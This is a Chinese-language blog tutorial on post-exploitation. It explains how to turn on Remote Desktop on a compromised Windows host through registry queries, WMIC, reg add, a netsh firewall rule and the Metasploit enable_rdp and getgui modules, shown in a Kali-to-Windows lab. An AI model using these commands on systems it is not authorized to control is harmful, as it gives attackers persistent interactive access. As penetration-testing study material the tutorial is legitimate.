开启目标远程桌面服务方法总结

一、目的

  获取了victim 的 shell控制权后如果想像管理员使用电脑一样control目标主机则需要确认对方远程登录服务是否开启,如果没有开启需要手动开启。(后渗透阶段)

Tips:
远程桌面默认端口:3389
远程桌面默认服务:termservice

二、CMD之远程桌面服务

2.1 查看远程桌面是否开启

  1. 方法一
    使用net命令,查看服务方式查看远程桌面是否开启:
    在这里插入图片描述

  2. 方法二
    通过注册表值查看是否开启(0x0是开启,0x1是关闭)

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

在这里插入图片描述
在这里插入图片描述

2.2 确认远程端口号是否默认

  远程桌面的默认端口是3389,为了防止管理员更改了远程端口给我们连接带来意想不到的情况,需要通过查看注册表键值确认远程桌面的端口是否为3389

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

在这里插入图片描述
(0xd3d是16进制的3389)
在这里插入图片描述

2.3 确认远程桌面服务状态

如果端口号是默认3389情况下,此状态开启并正常
在这里插入图片描述

2.4 WMIC开启/关闭远程桌面(推荐)

WMIC简介:不仅可以管理本地计算机而且可以管理同一域内所有远程计算机,拿到system shell权限情况下建议使用此种方式!

(开启服务参数为1,关闭服务参数为0)

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

在这里插入图片描述

Tips: 推荐此种方法,由于此方法会自动开启系统远程桌面中的允许远程连接到此计算机并启动默认的3389端口
在这里插入图片描述
如果是使用的net start termservice 命令则是只能启动服务,不开启端口和上方的系统远程桌面配置(不能进行远程桌面连接!)

2.5 更改远程桌面端口(附)

》》将远程桌面默认端口3389更改成3388

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3388 /f

在这里插入图片描述
》》重启服务
在这里插入图片描述
》》查看端口已经被更改
在这里插入图片描述

2.6 防火墙不过滤3389端口

开启对方远程登录后,进行登录后如果未修改防火墙会报如下错误:
在这里插入图片描述
修改防火墙配置,使得不过滤3389端口

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow 

在这里插入图片描述
再次连接成功
在这里插入图片描述

三、MSF开启目标远程桌面

Attacker Kali IP:10.32.22.238
Victim Windows 2008R2 IP:10.32.22.241

3.1 在MSF shell中开启远程桌面(推荐)

如果不是最高权限需要提权!

3.1.1 优 / 缺点

优点: 稳定,可多次启动关闭
缺点: 命令长,不易记住一般复制粘贴

3.1.2 启动远程桌面前 前期工作

》》已拿到了一个system shell(过程略)
在这里插入图片描述
》》进入shell(cmd)
在这里插入图片描述
》》确定远程桌面默认端口号是否改动(未改动)
在这里插入图片描述
》》确认远程桌面是否开启(未开启)
在这里插入图片描述
》》开始进入正文开启远程桌面

3.1.3 MSF shell中使用WMIC启动

》》启动服务

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

在这里插入图片描述
》》确认是否启动成功(或者通过 net start 查看服务)
在这里插入图片描述

3.2 使用MSF enable_rdp模块

3.2.1 优 / 缺点

优点: 命令简单,熟练的话不用复制WMIC繁琐命令
缺点: 只能启用并禁用一次,再次启用无效(Windows 2008R2 和Windows7中都出现这种情况,其它环境下未实验)

3.2.2 Meterpretr enable_rdp模块中启用

》》使用如下模块启用远程桌面

run post/windows/manage/enable_rdp 

(显示如下绿框中RDP被禁用,启用中……说明启用成功)
在这里插入图片描述
》》验证是否开启(已开启)
在这里插入图片描述
》》关闭服务(服务关闭成功)
(文件为启用模块后的给的路径,都在/root/.msf4/loot/目录下)

run multi_console_command -r <FileLocation>

在这里插入图片描述

Tips:
再次启动服务,会起不来,适合用一次
在这里插入图片描述

3.3 使用MSF getgui模块

3.3.1 优 / 缺点

优点: 命令简单
缺点: 只能启用并禁用一次,再次启用无效

3.3.2 Meterpreter getgui模块中启用

启用(关闭在执行后的说明中)
在这里插入图片描述

  • 2
    点赞
  • 15
    收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:酷酷鲨 设计师:CSDN官方博客 返回首页
评论

打赏作者

風月长情

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值